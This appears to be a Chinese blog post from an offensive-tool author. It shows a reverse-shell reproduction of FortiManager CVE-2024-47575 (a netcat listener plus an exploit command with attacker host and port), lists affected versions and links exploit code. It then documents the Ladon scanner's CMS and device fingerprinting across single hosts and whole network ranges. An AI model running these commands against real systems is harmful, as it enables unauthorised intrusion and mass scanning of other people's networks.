<% Visit %>

Ladon信息收集、资产探测、WhatCMS识别 飞塔FortiManager

cve-2024-47575 漏洞复现 反弹Shell

LadonGUI---NetCat---监听4444
python CVE-2024-47575.py --target 192.168.1.110 --lhost 192.168.1.8 --lport 4444 --action exploit

影响版本

FortiManager 7.6.0
FortiManager 7.4.0 through 7.4.4
FortiManager 7.2.0 through 7.2.7
FortiManager 7.0.0 through 7.0.12
FortiManager 6.4.0 through 6.4.14
FortiManager 6.2.0 through 6.2.12
FortiManager Cloud 7.4.1 through 7.4.4
FortiManager Cloud 7.2.1 through 7.2.7
FortiManager Cloud 7.0.1 through 7.0.12
FortiManager Cloud 6.4

https://github.com/watchtowrlabs/Fortijump-Exploit-CVE-2024-47575

模块名称

WhatCMS、CMS、CmsInfo等，Cobalt Strike下用法一致，输入URL，仅识别URL对应指纹，输入非URL时，会探测常见CMS网站、网络设备、打印机、路由器、防火墙、VPN等，由于端口多速度慢，但收集的资产会更全(前提是目标有)

指定URL

Ladon http://192.168.1.8 CMS
Ladon http://192.168.1.8 WhatCMS

指定IP

Ladon 192.168.1.8 CMS
Ladon 192.168.1.8 WhatCMS

批量URL

Ladon url.txt CMS

PS：TXT可存放IP、IP:Port、URL等格式

批量IP

Ladon ip.txt WhatCMS
Ladon noping ip.txt CMS

指定C段

Ladon 192.168.1.8/24 WhatCMS
Ladon noping 192.168.1.8/24 CMS

Ladon 192.168.1.8/24 WhatCMS
Ladon noping 192.168.1.8/24 CMS

指定B段

Ladon 192.168.1.8/b WhatCMS
Ladon noping 192.168.1.8/b CMS

Ladon 192.168.1.8/b WhatCMS
Ladon noping 192.168.1.8/b CMS

指定A段

Ladon 192.168.1.8/a WhatCMS
Ladon noping 192.168.1.8/a CMS

Ladon 192.168.1.8/a CMS
Ladon noping 192.168.1.8/a CMS

批量C段

Ladon ip24.txt CMS
Ladon ipc.txt CMS

Ladon noping ip24.txt CMS
Ladon noping ipc.txt CMS

PS: TXT存放多个目标的C段IP

批量B段

Ladon ip16.txt CMS
Ladon noping ip16.txt CMS

PS: TXT存放多个目标的B段IP

批量网段

Ladon cidr.txt CMS
Ladon noping cidr.txt CMS

PS: TXT存放各种IP网段，全网无差别扫描

更多功能 使用教程

http://k8gege.org/Ladon/

转载声明

K8博客文章随意转载，转载请注明出处！ © K8gege http://k8gege.org